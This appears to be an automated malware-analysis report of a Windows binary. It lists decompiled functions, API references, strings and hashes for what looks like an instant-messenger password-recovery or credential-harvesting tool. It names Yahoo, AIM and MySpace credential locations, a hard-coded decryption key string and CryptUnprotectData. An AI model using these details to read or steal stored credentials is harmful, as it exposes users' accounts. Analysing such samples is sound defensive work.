                                • Opcode Fuzzy Hash: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                • Instruction Fuzzy Hash: 62118E32A00219EFDB009FB9CD4DEEF7FB8EB84750F054165F905A7250DA70AD01CAA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E00403D24(void* _a4, char* _a8) {
                                				long _v8;
                                				void _v8199;
                                				char _v8200;
                                				void _v24582;
                                				short _v24584;
                                
                                				0x414060();
                                				_v24584 = 0;
                                				memset( &_v24582, 0, 0x3ffe);
                                				_v8200 = 0;
                                				memset( &_v8199, 0, 0x1fff);
                                				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                			}









                                APIs
                                • memset.MSVCRT ref: 00403D49
                                • memset.MSVCRT ref: 00403D62
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403D79
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403D98
                                • strlen.MSVCRT ref: 00403DAA
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DBB
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                • String ID:
                                • API String ID: 1786725549-0
                                • Opcode ID: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                • Instruction ID: 833f6c37e82b16f9b4c34b80bb2ce5ff812abd73926e68a98c8801a8732a43de
                                • Opcode Fuzzy Hash: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                • Instruction Fuzzy Hash: 2C111BB644122CFEEB119B94DC89EEB77ACEF08354F1041A6B715E2091E6349F448BB8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                • _strcmpi.MSVCRT ref: 0040F3D1
                                • _strcmpi.MSVCRT ref: 0040F3F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _strcmpi$memcpystrlen
                                • String ID: http://www.ebuddy.com$http://www.imvu.com$https://www.google.com
                                • API String ID: 2025310588-2353251349
                                • Opcode ID: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                • Instruction ID: 147ef2bbec41d1b0b79b570ae49dc02a3b2ea9406cbc79ec07c01e0a249b4c29
                                • Opcode Fuzzy Hash: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                • Instruction Fuzzy Hash: 1B11C1B21083409AD330EF25D8457DB77E8EFA4305F10893FE998A2182EB785649875A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040BA30(void* __eax, void* __ebx) {
                                				char _v264;
                                				char _v524;
                                				void* __edi;
                                				void* __esi;
                                				long _t13;
                                				void* _t18;
                                				int _t19;
                                				long _t20;
                                				void* _t27;
                                				void* _t31;
                                
                                				_t27 = __ebx;
                                				_t31 = __eax;
                                				_t13 = GetTempPathA(0x104,  &_v524);
                                				_t32 = _t13;
                                				if(_t13 == 0) {
                                					GetWindowsDirectoryA( &_v524, 0x104);
                                				}
                                				_v264 = 0;
                                				GetTempFileNameA( &_v524, 0x418628, 0,  &_v264);
                                				_t18 = E0040B9EA(_t31, _t32,  &_v264, 2, 1);
                                				if(_t18 != 0) {
                                					_t19 = OpenClipboard( *(_t31 + 0x108));
                                					_t34 = _t19;
                                					if(_t19 == 0) {
                                						_t20 = GetLastError();
                                					} else {
                                						_t20 = E004068B5(_t27, 0x104, _t31, _t34,  &_v264);
                                					}
                                					if(_t20 != 0) {
                                						E00406830(_t20,  *(_t31 + 0x108));
                                					}
                                					return DeleteFileA( &_v264);
                                				}
                                				return _t18;
                                			}














                                APIs
                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040BA4A
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BA5C
                                • GetTempFileNameA.KERNEL32(?,00418628,00000000,?), ref: 0040BA7E
                                • OpenClipboard.USER32(?), ref: 0040BA9E
                                • GetLastError.KERNEL32 ref: 0040BAB7
                                • DeleteFileA.KERNEL32(00000000), ref: 0040BAD4
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                • String ID:
                                • API String ID: 2014771361-0
                                • Opcode ID: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                • Instruction ID: 5bfde055311aa1c1ac8a047c999dbef42aa9d8293b3a95092e24ac928ebec7a0
                                • Opcode Fuzzy Hash: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                • Instruction Fuzzy Hash: E9115276600218ABDB609BA1DC49FCB77BCAB54701F0040B6B69AE2091DBB499C58F68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                • Instruction ID: 39cb4549293e6cd4e8f45f1fb6a35693fcb7bd1e2582dcc07fe9920ce8c868a3
                                • Opcode Fuzzy Hash: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                • Instruction Fuzzy Hash: 83014F32A0AA3527C6257E2675017CBA3646F05B29F15420FF808B73428B6C7DE046DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00413B3E
                                • memset.MSVCRT ref: 00413B57
                                • memset.MSVCRT ref: 00413B6B
                                  • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                • strlen.MSVCRT ref: 00413B87
                                • memcpy.MSVCRT ref: 00413BAC
                                • memcpy.MSVCRT ref: 00413BC2
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                  • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                • memcpy.MSVCRT ref: 00413C02
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpymemset$strlen
                                • String ID:
                                • API String ID: 2142929671-0
                                • Opcode ID: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                • Instruction ID: 3b0ef80f5f4f1d26b85f6ed19fc7f93af9089081b0544b1b4270697ce1475561
                                • Opcode Fuzzy Hash: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                • Instruction Fuzzy Hash: EB512CB290011DAFCB10EF55DC81AEEB7A9BF04309F5445BAE509E7141EB34AF898F94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                • strtoul.MSVCRT ref: 00402782
                                • _mbscpy.MSVCRT ref: 00402807
                                • _mbscpy.MSVCRT ref: 00402817
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscpy$QueryValuestrtoul
                                • String ID: 3 d5JKNNC,MANSLDJQ32ELK1N4SAIp08$TRIPWD
                                • API String ID: 4008679483-1446091703
                                • Opcode ID: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
                                • Instruction ID: 4ca16360b260b82c0f814568f8b1846068da3ba20428fc10580ffdfcf904f702
                                • Opcode Fuzzy Hash: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
                                • Instruction Fuzzy Hash: 2C31E83280424C6EDF01DBB8E941ADFBFB4AF19310F1444AAE944FB191D674AB49CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E0040B2F5(void* __eax) {
                                				void* __esi;
                                				_Unknown_base(*)()* _t30;
                                				void* _t35;
                                				intOrPtr _t38;
                                				void* _t40;
                                				intOrPtr* _t41;
                                				char* _t51;
                                				int _t58;
                                				intOrPtr _t69;
                                
                                				_t40 = __eax;
                                				memcpy( *((intOrPtr*)(__eax + 0x390)) + 0x1d4,  *(__eax + 0x38c), 0x1c8 << 2);
                                				asm("movsw");
                                				asm("movsb");
                                				_t44 =  *((intOrPtr*)(_t40 + 0x398));
                                				_t58 = 0;
                                				if( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)) > 0) {
                                					do {
                                						_t35 = E0040779F(_t58, _t44);
                                						0x413d74("/sort", _t35);
                                						if(_t35 == 0) {
                                							_t7 = _t58 + 1; // 0x1
                                							_t51 = E0040779F(_t7,  *((intOrPtr*)(_t40 + 0x398)));
                                							_t66 =  *_t51 - 0x7e;
                                							_t38 =  *((intOrPtr*)(_t40 + 0x390));
                                							if( *_t51 != 0x7e) {
                                								_push(0);
                                							} else {
                                								_push(1);
                                								_t51 = _t51 + 1;
                                							}
                                							_push(_t51);
                                							E0040AE7D(_t38, _t66);
                                						}
                                						_t44 =  *((intOrPtr*)(_t40 + 0x398));
                                						_t58 = _t58 + 1;
                                					} while (_t58 <  *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)));
                                				}
                                				E0040671B();
                                				 *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)) + 0x28)) = 0;
                                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)))) + 0x5c))();
                                				if(E004077AF( *((intOrPtr*)(_t40 + 0x398)), ?str?, 0xffffffff) == 0xffffffff) {
                                					_t69 =  *0x41e394; // 0x1
                                					_t41 =  *((intOrPtr*)(_t40 + 0x390));
                                					if(_t69 == 0) {
                                						 *0x41e398 =  *((intOrPtr*)(_t41 + 0x1ac));
                                						 *0x41e394 = 1;
                                					}
                                					_t30 =  *((intOrPtr*)( *_t41 + 0x60))(E0040AE57);
                                					qsort( *((intOrPtr*)( *_t41 + 0x64))(), 0,  *(_t41 + 0x28), _t30);
                                				}
                                				return SetCursor( *0x41dbd8);
                                 			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Cursor_mbsicmpqsort
                                • String ID: /nosort$/sort
                                • API String ID: 882979914-1578091866
                                • Opcode ID: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                • Instruction ID: c642ed81bba6fc27793a5d708b6807a860a9cb0bcd27181b40ce8d315371ea34
                                • Opcode Fuzzy Hash: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                • Instruction Fuzzy Hash: 3721A231600200DFDB05EF25C8C1E9577A9EF85728F2400BAFD19AF2D2CB79A841CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00413757
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                  • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                • RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CloseOpenQueryValuememset
                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                • API String ID: 1830152886-1703613266
                                • Opcode ID: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
                                • Instruction ID: 02697a5e3e6c6c3f452774ad5988b122dd70f79e91add571e9a1c89a2d7602b2
                                • Opcode Fuzzy Hash: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
                                • Instruction Fuzzy Hash: 9301F9B6B00104FFEF106A95AD42ADA7BACDF04315F10406BFE04F3251E675AF8586AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SHGetMalloc.SHELL32(?), ref: 004123A6
                                • SHBrowseForFolder.SHELL32(?), ref: 004123D8
                                • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004123EC
                                • _mbscpy.MSVCRT ref: 004123FF
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: BrowseFolderFromListMallocPath_mbscpy
                                • String ID: [@
                                • API String ID: 1479990042-3416412563
                                • Opcode ID: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                • Instruction ID: 5ef3e47e4b44953a2dad9ee1bf13406931f922e9c8d23326f6bb0268a582906b
                                • Opcode Fuzzy Hash: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                • Instruction Fuzzy Hash: 5F11FAB5900218EFCB00DFA9D984AEEBBF8EB49314B10406AE905E7200D779DE45CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00408C31(CHAR* _a4, intOrPtr _a8) {
                                				void _v4103;
                                				char _v4104;
                                
                                				0x414060();
                                				_v4104 = 0;
                                				memset( &_v4103, 0, 0x1000);
                                				GetPrivateProfileStringA(0x41e308, _a4, 0x417c88,  &_v4104, 0x1000, 0x41e200);
                                				if(_v4104 == 0) {
                                					return 0;
                                				} else {
                                					0x413d0c(_a8,  &_v4104);
                                					return 1;
                                				}
                                 			}

                                APIs
                                • memset.MSVCRT ref: 00408C55
                                • GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                • _mbscpy.MSVCRT ref: 00408C91
                                Strings
                                • ?@, xrefs: 00408C31
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfileString_mbscpymemset
                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
                                • API String ID: 408644273-2377969721
                                • Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                • Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
                                • Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                • Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E00406830(long __eax, struct HWND__* _a4) {
                                				char _v1028;
                                				char _v2052;
                                				void* __edi;
                                				long _t15;
                                
                                				_t15 = __eax;
                                				if(__eax == 0) {
                                					_t15 = GetLastError();
                                				}
                                				E00406735(_t15,  &_v1028);
                                				_push( &_v1028);
                                				_push(_t15);
                                				sprintf( &_v2052, "Error %d: %s");
                                				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
                                 			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ErrorLastMessagesprintf
                                • String ID: Error$Error %d: %s
                                • API String ID: 1670431679-1552265934
                                • Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                • Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
                                • Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                • Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • memset.MSVCRT ref: 00410939
                                • memset.MSVCRT ref: 0041097A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 95357979-0
                                • Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                • Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
                                • Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                • Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E0040C929(signed int __eax, void* __ecx, void* _a4) {
                                				unsigned int _t23;
                                				signed int _t25;
                                				unsigned int _t34;
                                				unsigned int _t36;
                                				void* _t40;
                                				unsigned int _t45;
                                				void* _t46;
                                				int _t47;
                                				void* _t48;
                                				void* _t50;
                                
                                				_t48 = __ecx;
                                				_t34 = __eax;
                                				_t23 =  *(__ecx + 0x10);
                                				_t36 = _t23 + __eax * 8;
                                				 *(__ecx + 0x10) = _t36;
                                				if(_t36 < _t23) {
                                					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
                                				}
                                				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
                                				_t25 = _t23 >> 0x00000003 & 0x0000003f;
                                				if(_t25 == 0) {
                                					L6:
                                					if(_t34 >= 0x40) {
                                						_t45 = _t34 >> 6;
                                						do {
                                							memcpy(_t48 + 0x18, _a4, 0x40);
                                							_t50 = _t50 + 0xc;
                                							E0040CA46(_t48 + 0x18, _t48);
                                							_a4 = _a4 + 0x40;
                                							_t34 = _t34 - 0x40;
                                							_t45 = _t45 - 1;
                                						} while (_t45 != 0);
                                					}
                                					_push(_t34);
                                					_push(_a4);
                                					_push(_t48 + 0x18);
                                				} else {
                                					_t46 = 0x40;
                                					_t47 = _t46 - _t25;
                                					_t40 = _t48 + 0x18 + _t25;
                                					if(_t34 >= _t47) {
                                						memcpy(_t40, _a4, _t47);
                                						_t50 = _t50 + 0xc;
                                						E0040CA46(_t48 + 0x18, _t48);
                                						_a4 = _a4 + _t47;
                                						_t34 = _t34 - _t47;
                                						goto L6;
                                					} else {
                                						_push(_t34);
                                						_push(_a4);
                                						_push(_t40);
                                					}
                                				}
                                				return memcpy();
                                 			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy
                                • String ID: @$@
                                • API String ID: 3510742995-149943524
                                • Opcode ID: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                • Instruction ID: 666a53640e029d8b41511af47e133ff9607f2a84e66000161f6e85dafd6cdb1f
                                • Opcode Fuzzy Hash: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                • Instruction Fuzzy Hash: 7C115BF2A00709ABCB248F25ECC0DAA77A8EB50344B00033FFD0696291E634DE49C6D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00410BB7
                                • memset.MSVCRT ref: 00410BCE
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 00410BEA
                                • strlen.MSVCRT ref: 00410BF9
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memsetstrlen$FolderPathSpecial_mbscat_mbscpy
                                • String ID: MySpace\IM\users.txt
                                • API String ID: 1027419547-1720829597
                                • Opcode ID: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
                                • Instruction ID: 202a42f0f95dfe566303623c375a0ffeb092d6a880f5aac0c7a4f490a513d9c5
                                • Opcode Fuzzy Hash: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
                                • Instruction Fuzzy Hash: 3511CA7390411C6AD710EA51EC85EDB777C9F61305F1404FBE549E2042EEB89FC88BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 49%
                                			E0040A455(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                				void _v259;
                                				char _v260;
                                				char* _t30;
                                				signed int _t33;
                                				char* _t44;
                                				void* _t46;
                                
                                				E004067EC(_a4, "<item>");
                                				_t33 = 0;
                                				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
                                					do {
                                						_v260 = 0;
                                						memset( &_v259, 0, 0xfe);
                                						 *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4),  *((intOrPtr*)(__edi + 0x4c)));
                                						0x41244b();
                                						_t44 =  &_v260;
                                						E00409DD6(_t44,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
                                						_t30 = _t44;
                                						_push(_t30);
                                						_push( *((intOrPtr*)(__edi + 0x50)));
                                						_push(_t30);
                                						sprintf( *(__edi + 0x54), "<%s>%s</%s>");
                                						E004067EC(_a4,  *(__edi + 0x54));
                                						_t46 = _t46 + 0x28;
                                						_t33 = _t33 + 1;
                                					} while (_t33 <  *((intOrPtr*)(__edi + 0x20)));
                                				}
                                				return E004067EC(_a4, "</item>");
                                 			}

                                APIs
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                • memset.MSVCRT ref: 0040A48B
                                  • Part of subcall function 0041244B: memcpy.MSVCRT ref: 004124B9
                                  • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                  • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                • sprintf.MSVCRT ref: 0040A4D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                • String ID: <%s>%s</%s>$</item>$<item>
                                • API String ID: 3337535707-2769808009
                                • Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                • Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
                                • Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                • Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			E0040B1EC(void* __ebx) {
                                				void* __esi;
                                				void* _t18;
                                				void* _t37;
                                
                                				_t37 = __ebx;
                                				_t18 = E00401033();
                                				if(_t18 == 0x37e9) {
                                					memcpy( *((intOrPtr*)(__ebx + 0x390)) + 0x1d4,  *(__ebx + 0x38c), 0x1c8 << 2);
                                					asm("movsw");
                                					asm("movsb");
                                					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0xb, 0, 0);
                                					E0040671B();
                                					 *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)) + 0x28)) = 0;
                                					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0x1009, 0, 0);
                                					if(E004028E7() == 0) {
                                						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)))) + 0x5c))();
                                					}
                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x390)))) + 0x74))(1);
                                					E0040B15B(_t37);
                                					SetCursor( *0x41dbd8);
                                					SetFocus( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184));
                                					return SendMessageA( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184), 0xb, 1, 0);
                                				}
                                				return _t18;
                                			}







                                APIs
                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B233
                                  • Part of subcall function 0040671B: LoadCursorA.USER32(00000000,00007F02), ref: 00406722
                                  • Part of subcall function 0040671B: SetCursor.USER32(00000000), ref: 00406729
                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B256
                                  • Part of subcall function 004028E7: GetModuleHandleA.KERNEL32(00000000), ref: 00402902
                                  • Part of subcall function 004028E7: GetProcAddress.KERNEL32(00000000,00000000), ref: 00402924
                                  • Part of subcall function 004028E7: FreeLibrary.KERNEL32(00000000), ref: 00402934
                                • SetCursor.USER32(?,?,0040C35B), ref: 0040B286
                                • SetFocus.USER32(?,?,?,0040C35B), ref: 0040B298
                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B2AF
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CursorMessageSend$AddressFocusFreeHandleLibraryLoadModuleProc
                                • String ID:
                                • API String ID: 1022157474-0
                                • Opcode ID: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                • Instruction ID: acf4f1a7ad8cb56491b263665e164ee1eacf8da490df75951db8ca09a257b5c1
                                • Opcode Fuzzy Hash: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                • Instruction Fuzzy Hash: 5C111235200204AFDB16AF55CC85FD537ADFF49708F0A40B9FD099F2A2CBB569108B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00408A69(void* __esi, struct HWND__* _a4, signed int _a8) {
                                				intOrPtr _v12;
                                				struct tagPOINT _v20;
                                				struct tagRECT _v36;
                                				int _t27;
                                				struct HWND__* _t30;
                                				struct HWND__* _t32;
